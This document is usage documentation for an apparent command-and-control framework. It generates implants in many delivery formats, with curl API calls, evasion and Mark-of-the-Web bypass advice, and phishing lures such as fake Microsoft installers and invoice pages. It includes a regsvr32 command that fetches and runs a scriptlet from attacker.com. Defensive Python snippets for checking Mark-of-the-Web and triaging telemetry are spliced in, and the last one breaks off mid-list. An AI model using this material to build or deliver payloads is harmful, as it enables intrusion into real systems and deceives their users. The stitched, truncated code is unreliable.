Payload Formats

Stentor generates payloads in 17 output formats covering every major delivery scenario -- from standard Windows executables to MOTW-bypassing containers and browser-based HTML smuggling. Each format is purpose-built for specific operational needs with distinct OPSEC tradeoffs.


Overview

The payload generation pipeline transforms Go implant source code into deployable binaries through cross-compilation and optional obfuscation on the Relay agent.

```mermaid
flowchart LR
    A[Operator] -->|POST /api/v1/payloads/generate| B[Backend]
    B -->|WebSocket dispatch| C[Relay]
    C -->|Go cross-compile<br>+ Garble obfuscation<br>+ Donut shellcode| D[Payload Binary]
    D -->|Return binary| B
    B -->|Store + respond| A
```

Stageless vs Staged Delivery

Stentor supports two implant delivery models:

| Model | Size | Description | Best For |
|---|---|---|---|
| Stageless | ~2MB | Full implant embedded in payload | Reliability, offline targets, air-gapped networks |
| Staged | ~50KB | Small downloader fetches full implant from staging endpoint | Smaller initial footprint, easier implant updates |

When to use each

Use stageless when you need guaranteed execution without network dependencies -- the entire implant is self-contained. Use staged when initial payload size matters (e.g., phishing attachments, limited upload channels) and the target has network connectivity to the staging endpoint.


Generating Payloads

API Endpoint

POST /api/v1/payloads/generate -- Generate a single payload via the connected Relay.

Request Fields

| Field | Type | Required | Description |
|---|---|---|---|
| delivery_type | string | Yes | Payload format: exe, lnk, docm, xlsm, iso, hta, html_smuggling, msi, vhd, vhdx, xll, onenote, sct |
| implant_variant | string | No | Implant type: standalone (default), staged, dll, service, shellcode |
| listener_id | string | No | UUID of listener (preferred over c2_url) |
| c2_url | string | No | Direct C2 URL (fallback if no listener_id) |
| architecture | string | No | Target architecture: x64 (default), x86 |
| sleep | int | No | Beacon callback interval in seconds |
| jitter | int | No | Jitter percentage (0-100) |
| filename | string | No | Output filename (auto-generated if empty) |
| obfuscate | bool | No | Enable Garble obfuscation (unique hash per build) |
| profile | string | No | Malleable C2 profile name |
| exit_func | string | No | process (ExitProcess, default) or thread (ExitThread) |
| kill_date | string | No | RFC3339 expiration date (e.g., 2026-06-01T00:00:00Z) |
| host_uri | string | No | Auto-host payload at this URI on the listener |

Basic EXE Generation

```bash
curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "exe",
    "implant_variant": "standalone",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "architecture": "x64",
    "filename": "update.exe"
  }'
```

Batch Generation

POST /api/v1/listeners/{id}/generate-all -- Generate all payload variants for a listener as a ZIP archive.

Produces the following variants automatically:

| Filename | Variant | Architecture |
|---|---|---|
| beacon.exe | standalone | x86 |
| beacon64.exe | standalone | x64 |
| beacon.dll | dll | x86 |
| beacon64.dll | dll | x64 |
| beacon-svc.exe | service | x86 |
| beacon-svc64.exe | service | x64 |
| beacon.bin | shellcode | x86 |
| beacon64.bin | shellcode | x64 |
| beacon.ps1 | staged | x64 |

```bash
curl -s -X POST "https://stentor.app/api/v1/listeners/6ea88162-d558-404a-a19f-4b4cab34b22f/generate-all" \
  -H "Authorization: Bearer $TOKEN" \
  -o payloads.zip
```

Architecture Filter

Pass {"architecture": "x64"} in the request body to generate only 64-bit variants.

Regeneration

POST /api/v1/payloads/{id}/regenerate -- Rebuild a payload from its stored configuration. Useful for generating a fresh copy with a new hash while keeping the same settings.

```bash
curl -s -X POST "https://stentor.app/api/v1/payloads/abc123/regenerate" \
  -H "Authorization: Bearer $TOKEN"
```

Download

GET /api/v1/payloads/{id}/download -- Download a generated payload binary. This is a public endpoint (no authentication required) so targets can fetch payloads directly.

```bash
curl -s "https://stentor.app/api/v1/payloads/abc123/download" -o payload.exe
```

Auto-Hosting

Set host_uri in the generation request to automatically serve the payload at a specific URI path on the listener:

```bash
curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "exe",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "filename": "update.exe",
    "host_uri": "/updates/kb5034441.exe"
  }'
```

The response includes a hosted_url field with the full URL where the payload is accessible.


Core Payload Formats

These are the fundamental binary output formats that all other delivery mechanisms build upon.

Windows EXE

Standard Windows PE executable -- the simplest and most direct payload format.

| Property | Value |
|---|---|
| delivery_type | exe |
| implant_variant | standalone |
| Extension | .exe |
| MITRE | -- |

```bash
curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "exe",
    "implant_variant": "standalone",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "architecture": "x64"
  }'
```

OPSEC Considerations

  • File written to disk -- subject to AV static and behavioral scanning
  • Needs Mark-of-the-Web bypass for downloads (use ISO/VHD container or HTML smuggling)
  • Process creation generates Sysmon Event ID 1
  • Consider obfuscation ("obfuscate": true) for unique hash per build

Windows DLL

Dynamic-link library for DLL sideloading scenarios. Loads within the context of a legitimate application, inheriting its reputation and trust.

| Property | Value |
|---|---|
| delivery_type | exe |
| implant_variant | dll |
| Extension | .dll |
| MITRE | T1574.002 (DLL Side-Loading) |

DLL-Specific Options:

| Option | Type | Default | Description |
|---|---|---|---|
| export_name | string | DllMain | Primary export function name |

```bash
curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "exe",
    "implant_variant": "dll",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "architecture": "x64"
  }'
```

OPSEC Considerations

  • Better than standalone EXE when sideloaded via a legitimate, signed application
  • Beacon runs inside the host process -- blends with legitimate activity
  • Detection: DLL load event (Sysmon Event ID 7), unsigned DLL in application directory
  • Identify sideloading-vulnerable applications on the target before deployment

Service EXE

Implements the Windows Service Control Manager (SCM) interface for service-based persistence. Runs as a Windows service, surviving reboots and running as SYSTEM.

| Property | Value |
|---|---|
| delivery_type | exe |
| implant_variant | service |
| Extension | .exe |
| MITRE | T1543.003 (Create or Modify System Process: Windows Service) |

Service-Specific Options:

| Option | Type | Default | Description |
|---|---|---|---|
| service_name | string | StentorSvc | Internal SCM service name |
| display_name | string | Stentor Update Service | Human-readable display name |
| description | string | Provides system update functionality. | Service description |

```bash
curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "exe",
    "implant_variant": "service",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "architecture": "x64"
  }'
```

OPSEC Considerations

  • Appears as a legitimate Windows service in services.msc
  • Runs as SYSTEM -- no need for privilege escalation after installation
  • Detection: service creation event (System Event ID 7045), new service binary in filesystem
  • Use realistic service_name and display_name values that blend with existing services

Raw Shellcode

Position-independent code generated via Donut conversion. The most flexible format -- inject into any process without touching disk.

| Property | Value |
|---|---|
| delivery_type | exe |
| implant_variant | shellcode |
| Extension | .bin (raw), varies by output format |
| MITRE | T1620 (Reflective Code Loading) |

Shellcode-Specific Options:

| Option | Type | Default | Description |
|---|---|---|---|
| output_format | string | raw | Output format: raw, c, csharp, python, ruby, java, perl, vba, hex |
| architecture | string | x64 | Target: x64, x86, x84 (both) |
| compress | bool | false | Enable aPLib compression |
| encrypt | bool | false | Enable Donut symmetric encryption |
| bypass_amsi | bool | false | Enable AMSI bypass in the Donut loader |

```bash
# Raw x64 shellcode blob
curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "exe",
    "implant_variant": "shellcode",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "shellcode_config": {
      "output_format": "raw",
      "architecture": "x64"
    }
  }'
```

```bash
# C# source output with compression, encryption and AMSI bypass enabled
curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "exe",
    "implant_variant": "shellcode",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "shellcode_config": {
      "output_format": "csharp",
      "architecture": "x64",
      "compress": true,
      "encrypt": true,
      "bypass_amsi": true
    }
  }'
```

OPSEC Considerations

  • No file on disk -- most evasive when combined with process injection
  • Memory-resident only, but subject to memory scanning and ETW telemetry
  • Use compress and encrypt options to hinder static analysis of the shellcode blob
  • bypass_amsi adds an AMSI patch to the Donut loader stub

Stager

Small downloader (~50KB) that fetches the full implant from a staging endpoint. Two-phase delivery reduces initial payload size.

| Property | Value |
|---|---|
| delivery_type | exe |
| implant_variant | staged |
| Extension | .exe or .ps1 |
| MITRE | T1105 (Ingress Tool Transfer) |

Stager-Specific Options:

| Option | Type | Default | Description |
|---|---|---|---|
| auth_token | string | (empty) | Bearer token for staging endpoint authentication |
| pubkey_path | string | /api/v1/c2/pubkey | RSA public key endpoint path |
| keyx_path | string | /api/v1/c2/keyx | Key exchange endpoint path |
| stage_path | string | /api/v1/c2/stage | Staging endpoint path |

```bash
curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "exe",
    "implant_variant": "staged",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "architecture": "x64"
  }'
```

OPSEC Considerations

  • Smaller initial footprint (~50KB vs ~2MB) -- better for size-constrained channels
  • Staging traffic generates additional network connections that may be detected
  • Override default staging paths (pubkey_path, keyx_path, stage_path) for OPSEC
  • Two-phase execution pattern is a known detection indicator
  • Use auth_token to prevent unauthorized access to the staging endpoint

Document & Macro Formats

Traditional document-based delivery mechanisms. Effective against legacy environments but increasingly blocked by modern Office policies.

Word Macro (DOCM)

Macro-enabled Word document containing embedded VBA that executes the payload on document open.

| Property | Value |
|---|---|
| delivery_type | docm |
| Extension | .docm |
| MITRE | T1566.001 (Spearphishing Attachment) |

```bash
curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "docm",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f"
  }'
```

OPSEC Considerations

  • Macros are blocked by default in Office 2022+ and Microsoft 365 for internet-sourced documents
  • Only viable if target organization has macros enabled via Group Policy
  • Detection: macro execution event, child process spawned by WINWORD.EXE
  • Consider MOTW bypass (ISO/VHD) to circumvent macro-blocking policies

Excel Macro (XLSM)

Macro-enabled Excel spreadsheet with embedded VBA execution. Same capabilities and limitations as DOCM.

| Property | Value |
|---|---|
| delivery_type | xlsm |
| Extension | .xlsm |
| MITRE | T1566.001 (Spearphishing Attachment) |

```bash
curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "xlsm",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f"
  }'
```

OPSEC Considerations

  • Same macro-blocking restrictions as DOCM (Office 2022+ blocks by default)
  • Detection: macro execution event, child process spawned by EXCEL.EXE
  • Excel-specific: Auto_Open or Workbook_Open macros are well-known detection signatures

HTA

HTML Application executed via mshta.exe. Supports three attack methods: direct executable download, PowerShell execution, or VBA shellcode injection.

| Property | Value |
|---|---|
| delivery_type | hta |
| Extension | .hta |
| MITRE | T1218.005 (System Binary Proxy Execution: Mshta) |

HTA-Specific Options:

| Option | Type | Default | Description |
|---|---|---|---|
| method | string | executable | Attack method: executable, powershell, vba |
| script_type | string | vbs | Scripting language: vbs, js |
| title | string | Loading... | HTA window title |
| body_text | string | Please wait while document loads... | Display text |
| body_html | string | (empty) | Custom HTML body (overrides body_text) |
| width | int | 400 | Window width in pixels |
| height | int | 200 | Window height in pixels |

Downloads EXE from C2 and executes it via MSXML2.XMLHTTP:

```bash
curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "hta",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "hta_config": {
      "method": "executable",
      "title": "Document Viewer",
      "body_text": "Loading secure document..."
    }
  }'
```

Embeds encoded PowerShell command in HTA VBScript:

```bash
curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "hta",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "hta_config": {
      "method": "powershell",
      "script_type": "vbs"
    }
  }'
```

Self-contained shellcode injection -- no EXE download required:

```bash
curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "hta",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "hta_config": {
      "method": "vba"
    }
  }'
```

OPSEC Considerations

  • mshta.exe is a well-known LOLBin -- heavily monitored by EDR
  • Detection: mshta.exe process creation, child process spawning, script content analysis
  • The vba method avoids an additional network download but uses PowerShell for shellcode injection
  • Consider using HTA inside an ISO/VHD container for MOTW bypass

Container Formats (MOTW Bypass)

These formats bypass Mark-of-the-Web (MOTW), preventing SmartScreen prompts and zone-based security checks on files extracted from the container.

How MOTW Bypass Works

When a file is downloaded from the internet, Windows attaches a Zone.Identifier alternate data stream (ADS) marking it as "from the internet." Files inside mounted ISO/VHD containers do not inherit this mark, bypassing SmartScreen and other MOTW-based protections (MITRE T1553.005).
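The mark described above is a small stream in INI form that a defender can read back to confirm whether a file ever carried it. The following is an added example, not part of the Stentor documentation: it parses Zone.Identifier content (a constructed sample is embedded), classifies the zone, and reads the stream off a file where the filesystem supports alternate data streams.

```python
"""Check whether a file carries Mark-of-the-Web (MOTW).

Added example, not part of the Stentor documentation. It parses the
Zone.Identifier alternate data stream that Windows writes to downloaded
files; this stream is exactly what files extracted from a mounted ISO or
VHD lack, which is why SmartScreen never sees them.
"""
from __future__ import annotations

import configparser
from pathlib import Path
from typing import Optional

# URL security zones (Windows URLZONE values) as written in ZoneId=.
ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}

# Constructed sample: what a browser typically writes for an internet download.
SAMPLE_STREAM = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://example.invalid/portal/\r\n"
    "HostUrl=https://example.invalid/files/report.iso\r\n"
)


def parse_zone_identifier(stream_text: str) -> dict:
    """Parse Zone.Identifier content into zone id, zone name and origin URLs.

    Raises ValueError on a stream without a [ZoneTransfer] section or a
    numeric ZoneId; real-world streams are sometimes empty or malformed,
    and a checker must not mistake those for "marked".
    """
    parser = configparser.ConfigParser(interpolation=None)
    parser.optionxform = str  # keep key case: ZoneId, HostUrl, ReferrerUrl
    parser.read_string(stream_text.replace("\r\n", "\n"))
    if not parser.has_section("ZoneTransfer"):
        raise ValueError("no [ZoneTransfer] section")
    try:
        zone_id = int(parser.get("ZoneTransfer", "ZoneId"))
    except (configparser.NoOptionError, ValueError) as exc:
        raise ValueError("missing or non-numeric ZoneId") from exc
    return {
        "zone_id": zone_id,
        "zone_name": ZONE_NAMES.get(zone_id, "Unknown"),
        "referrer_url": parser.get("ZoneTransfer", "ReferrerUrl", fallback=None),
        "host_url": parser.get("ZoneTransfer", "HostUrl", fallback=None),
    }


def is_marked_from_internet(stream_text: str) -> bool:
    """True for the Internet (3) and Restricted sites (4) zones, the ones that
    make SmartScreen and Office Protected View treat the file as untrusted."""
    return parse_zone_identifier(stream_text)["zone_id"] >= 3


def read_motw(path: str) -> Optional[dict]:
    """Read and parse the Zone.Identifier stream of a file on NTFS.

    Returns None when the stream is absent (for example a file copied out of
    a mounted ISO), malformed, or when the platform has no ADS support.
    """
    try:
        text = Path(f"{path}:Zone.Identifier").read_text(encoding="utf-8", errors="replace")
        return parse_zone_identifier(text)
    except (OSError, ValueError):
        return None
```

A file that came in through an ISO or VHD returns None from read_motw even though the container itself was downloaded, which is the gap the formats in this section exploit.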

ISO

ISO 9660 optical disc image container. Windows auto-mounts ISOs on double-click, presenting files in Explorer without MOTW restrictions.

| Property | Value |
|---|---|
| delivery_type | iso |
| Extension | .iso |
| MITRE | T1553.005 (Subvert Trust Controls: Mark-of-the-Web Bypass) |

ISO-Specific Options:

| Option | Type | Default | Description |
|---|---|---|---|
| volume_label | string | DOCUMENTS | ISO volume label (max 32 chars) |
| include_lnk | bool | false | Include a shortcut that launches the EXE |
| lnk_filename | string | Report.lnk | Visible shortcut filename |
| exe_filename | string | update.exe | Filename for the hidden EXE |
| decoy_filename | string | (empty) | Optional decoy document name (e.g., Report.pdf) |
| decoy_data | bytes | (empty) | Optional decoy document content |

```bash
curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "iso",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "iso_config": {
      "volume_label": "Q4_REPORT",
      "include_lnk": true,
      "lnk_filename": "Q4 Financial Report.lnk",
      "exe_filename": "reader.exe",
      "decoy_filename": "Q4_Report.pdf"
    }
  }'
```

OPSEC Considerations

  • Windows auto-mounts ISOs -- no additional software required on target
  • Files inside lack MOTW -- bypasses SmartScreen prompts
  • Detection: ISO mount event in Windows logs, executable launched from mounted volume
  • Use include_lnk with a convincing name to improve social engineering success
  • Include a decoy document for pretext credibility

VHD / VHDX

Virtual hard disk container. Functionally similar to ISO for MOTW bypass but uses the VHD/VHDX format (Windows 8+ native support).

| Property | Value |
|---|---|
| delivery_type | vhd or vhdx |
| Extension | .vhd or .vhdx |
| MITRE | T1553.005 (Subvert Trust Controls: Mark-of-the-Web Bypass) |

VHD-Specific Options:

| Option | Type | Default | Description |
|---|---|---|---|
| format | string | vhd | Container format: vhd or vhdx |
| disk_size_mb | int | 50 | Virtual disk size in MB |
| volume_label | string | DOCUMENTS | FAT filesystem volume label (max 11 chars) |
| exe_filename | string | update.exe | Filename for the embedded EXE |
| include_lnk | bool | false | Include a shortcut that launches the EXE |
| lnk_filename | string | Report.lnk | Visible shortcut filename |
| decoy_filename | string | (empty) | Optional decoy document name |

```bash
curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "vhd",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "vhd_config": {
      "format": "vhd",
      "disk_size_mb": 50,
      "volume_label": "DOCS",
      "include_lnk": true,
      "lnk_filename": "Open Report.lnk",
      "exe_filename": "viewer.exe"
    }
  }'
```

OPSEC Considerations

  • Similar MOTW bypass as ISO but less commonly used -- potentially lower defender awareness
  • VHD format is simpler and more compatible; VHDX is the newer dynamic format
  • Detection: VHD mount event, disk event logs, executable launched from mounted volume
  • Larger file size than ISO due to disk image overhead -- adjust disk_size_mb accordingly

Modern Delivery Formats

Contemporary delivery mechanisms targeting current security gaps and leveraging trusted system binaries.

HTML Smuggling

Embeds a Base64-encoded payload in an HTML file that reconstructs and triggers download via JavaScript blob. Bypasses email gateways and web proxies that inspect file downloads.

| Property | Value |
|---|---|
| delivery_type | html_smuggling |
| Extension | .html |
| MITRE | T1027.006 (Obfuscated Files: HTML Smuggling) |

HTML Smuggling Options:

| Option | Type | Default | Description |
|---|---|---|---|
| embedded_payload_type | string | exe | Embedded payload: exe, iso, hta |
| title | string | Loading Document... | HTML page title |
| body_text | string | Please wait while your document is being prepared... | Display text |
| download_filename | string | document.exe | Downloaded file name |
| auto_download | bool | true | Trigger download automatically on page load |

```bash
curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "html_smuggling",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "html_smuggling_config": {
      "embedded_payload_type": "iso",
      "title": "Secure Document Portal",
      "body_text": "Your document is being prepared for download...",
      "download_filename": "report.iso",
      "auto_download": true
    }
  }'
```

Combine with ISO for maximum evasion

Use "embedded_payload_type": "iso" to chain HTML smuggling with MOTW bypass. The HTML page delivers an ISO that contains the payload -- bypassing both email gateway scanning and SmartScreen.

OPSEC Considerations

  • Bypasses email gateways, web proxies, and network-level file inspection
  • Payload is reconstructed client-side from Base64 data -- never transmitted as a binary
  • Detection: large HTML files with embedded JavaScript, JavaScript blob creation events
  • auto_download triggers download immediately -- disable for a click-to-download flow

MSI

Windows Installer package executed via the trusted, signed msiexec.exe system binary.

| Property | Value |
|---|---|
| delivery_type | msi |
| Extension | .msi |
| MITRE | T1218.007 (System Binary Proxy Execution: Msiexec) |

MSI-Specific Options:

| Option | Type | Default | Description |
|---|---|---|---|
| product_name | string | System Update | MSI product name |
| product_version | string | 1.0.0 | MSI product version |
| manufacturer | string | Microsoft Corporation | MSI manufacturer |
| description | string | (empty) | Product description |
| upgrade_code | string | (auto-generated) | MSI upgrade GUID |
| install_scope | string | perMachine | Install scope: perMachine or perUser |

```bash
curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "msi",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "msi_config": {
      "product_name": "Security Update KB5034441",
      "manufacturer": "Microsoft Corporation",
      "product_version": "10.0.19045",
      "install_scope": "perMachine"
    }
  }'
```

OPSEC Considerations

  • msiexec.exe is a trusted, Microsoft-signed binary -- execution via a trusted process
  • perMachine scope triggers UAC prompt; perUser installs silently
  • Detection: msiexec.exe child process creation, MSI install event logs (MsiInstaller Event ID 1033/1042)
  • Use realistic product metadata that matches the pretext scenario

OneNote

OneNote package with an embedded HTA payload. Emerged as a popular delivery mechanism after Microsoft blocked macros by default.

| Property | Value |
|---|---|
| delivery_type | onenote |
| Extension | .onepkg |
| MITRE | T1566.001 (Spearphishing Attachment) |

OneNote-Specific Options:

| Option | Type | Default | Description |
|---|---|---|---|
| embedded_payload_type | string | hta | Embedded payload: hta, vbs, cmd |
| button_text | string | Double Click to View Document | Social engineering overlay text |
| title | string | Important Document | OneNote page title |
| body_text | string | This document contains secure content. Double-click the attachment to view. | Page body text |

```bash
curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "onenote",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "onenote_config": {
      "embedded_payload_type": "hta",
      "button_text": "Click to View Invoice",
      "title": "Invoice #2024-0847"
    }
  }'
```

OPSEC Considerations

  • Originally effective post-macro-disable, but Microsoft has since added restrictions to OneNote embedded files
  • Detection: OneNote child process creation, embedded file extraction events
  • User must click the embedded object -- social engineering overlay text is critical

Excel XLL

Excel add-in DLL that executes via the xlAutoOpen export when loaded by Excel.

| Property | Value |
|---|---|
| delivery_type | xll |
| Extension | .xll |
| MITRE | T1137.006 (Office Application Startup: Add-ins) |

XLL-Specific Options:

| Option | Type | Default | Description |
|---|---|---|---|
| export_name | string | xlAutoOpen | Export function (reserved -- xlAutoOpen is always used) |

```bash
curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "xll",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "architecture": "x64"
  }'
```

OPSEC Considerations

  • XLL files are loaded by Excel as add-ins, calling xlAutoOpen on load
  • Microsoft has blocked XLL add-ins from the internet in Microsoft 365 (2023+)
  • Detection: unsigned DLL loaded by EXCEL.EXE, add-in load event
  • Most effective via internal delivery (file share, SharePoint) rather than email

COM Scriptlet (SCT)

XML scriptlet executed via the signed regsvr32.exe system binary. Supports execution from a remote URL without writing to disk.

| Property | Value |
|---|---|
| delivery_type | sct |
| Extension | .sct |
| MITRE | T1218.010 (System Binary Proxy Execution: Regsvr32) |

```bash
curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "sct",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f"
  }'
```

Execute on target via:

regsvr32 /s /n /u /i:https://attacker.com/update.sct scrobj.dll

OPSEC Considerations

  • regsvr32.exe is a trusted, signed Windows binary -- proxy execution bypasses application whitelisting
  • Can execute directly from URL -- no file on disk required
  • Detection: regsvr32.exe with /i:URL parameter, scrobj.dll load event
  • Well-known technique -- most EDR solutions detect regsvr32 scriptlet execution

LNK

Windows shortcut file embedding a PowerShell download cradle. Double-click execution with a customizable icon.

| Property | Value |
|---|---|
| delivery_type | lnk |
| Extension | .lnk |
| MITRE | T1204.002 (User Execution: Malicious File) |

```bash
curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "lnk",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f",
    "filename": "Q4 Report.lnk"
  }'
```

OPSEC Considerations

  • Double-click execution -- relies on social engineering for user interaction
  • Contains embedded PowerShell command visible via LNK forensic parsing
  • Detection: LNK file analysis, PowerShell execution from shortcut, child process creation
  • Best delivered inside ISO/VHD containers to bypass MOTW

Format Selection Guide

| Scenario | Recommended Format | Why |
|---|---|---|
| Initial access via phishing email | HTML Smuggling + ISO | Bypasses email gateway scanning + MOTW |
| USB drop / physical access | EXE in ISO or VHD | MOTW bypass, auto-mount on double-click |
| DLL sideloading (known target app) | DLL | Loads in context of trusted process |
| Service persistence | Service EXE | Survives reboots, runs as SYSTEM |
| In-memory only (no file on disk) | Shellcode | Inject into existing process via BOF/injection |
| Two-stage delivery (small footprint) | Stager | ~50KB initial payload, fetches full implant |
| Trusted installer execution | MSI | Runs via signed msiexec.exe |
| LOLBin execution (regsvr32) | SCT | Signed binary, supports URL execution |
| Legacy macro delivery | DOCM / XLSM | Only viable if macros are enabled on target |
| Excel add-in delivery | XLL | Loads via xlAutoOpen in Excel process |
| Post-macro-disable phishing | OneNote | Embedded HTA payload in .onepkg |
| Shortcut-based delivery | LNK inside ISO | Social engineering with MOTW bypass |

Chain formats for layered evasion

Combine delivery formats for defense-in-depth bypass. For example: HTML Smuggling (bypasses email gateway) delivers an ISO (bypasses MOTW/SmartScreen) containing an EXE or LNK (actual execution). Each layer defeats a different security control.
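Each format above lists the host telemetry it leaves (mshta.exe, regsvr32 with /i:URL and the scrobj.dll load, child processes of WINWORD.EXE, EXCEL.EXE, OneNote and msiexec.exe, unsigned DLLs loaded from the application directory, XLL loads, System Event ID 7045). The following is an added example, not Stentor code, that turns those bullets into triage rules over Sysmon-style event records; the events are constructed, the field names follow Sysmon's, and the ATT&CK ids are the ones quoted for each format on this page.

```python
"""Triage host events for the delivery-format indicators this guide's
"Detection" bullets name: mshta.exe, regsvr32 /i:URL and scrobj.dll,
Office and msiexec child processes, unsigned side-loaded DLLs, XLL loads
and service installs. Added example with constructed events; not Stentor code.
"""
from __future__ import annotations

import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    technique: str  # ATT&CK id as listed for the format in this guide
    detail: str


OFFICE_PARENTS = {"winword.exe", "excel.exe", "onenote.exe"}
REMOTE_SCRIPTLET = re.compile(r"/i:\s*(https?|ftp)://", re.IGNORECASE)


def _base(path: str | None) -> str:
    return ntpath.basename(path or "").lower()


def _dir(path: str | None) -> str:
    return ntpath.dirname(path or "").lower()


def triage(event: dict) -> list[Finding]:
    """Apply the rules to one event. Keys mirror Sysmon/System field names:
    Channel, EventID, Image, ParentImage, CommandLine, ImageLoaded, Signed,
    ServiceName, ImagePath."""
    found: list[Finding] = []
    channel, eid = event.get("Channel"), event.get("EventID")
    if channel == "Sysmon" and eid == 1:  # process creation
        image, parent = _base(event.get("Image")), _base(event.get("ParentImage"))
        cmd = event.get("CommandLine", "")
        if image == "mshta.exe":
            found.append(Finding("mshta_execution", "T1218.005", cmd))
        if image == "regsvr32.exe" and REMOTE_SCRIPTLET.search(cmd):
            found.append(Finding("regsvr32_remote_scriptlet", "T1218.010", cmd))
        if parent in OFFICE_PARENTS:
            found.append(Finding("office_child_process", "T1566.001", f"{parent} -> {image}"))
        if parent == "msiexec.exe":
            found.append(Finding("msiexec_child_process", "T1218.007", f"msiexec.exe -> {image}"))
    elif channel == "Sysmon" and eid == 7:  # image loaded
        image, loaded = event.get("Image"), event.get("ImageLoaded", "")
        signed = str(event.get("Signed", "")).lower() == "true"
        if _base(image) == "excel.exe" and loaded.lower().endswith(".xll"):
            found.append(Finding("excel_xll_addin_load", "T1137.006", loaded))
        if _base(image) == "regsvr32.exe" and _base(loaded) == "scrobj.dll":
            found.append(Finding("regsvr32_scrobj_load", "T1218.010", loaded))
        # unsigned DLL sitting next to the host executable: the side-loading shape
        if not signed and _dir(image) == _dir(loaded):
            found.append(Finding("unsigned_dll_in_app_dir", "T1574.002", loaded))
    elif channel == "System" and eid == 7045:  # service installed
        found.append(Finding("service_installed", "T1543.003",
                             f"{event.get('ServiceName')} -> {event.get('ImagePath')}"))
    return found


def triage_all(events) -> list[Finding]:
    return [f for e in events for f in triage(e)]


# Constructed sample events (values are made up, not captured telemetry).
SAMPLE_EVENTS = [
    {"Channel": "Sysmon", "EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "D:\Q4 Financial Report.hta"'},
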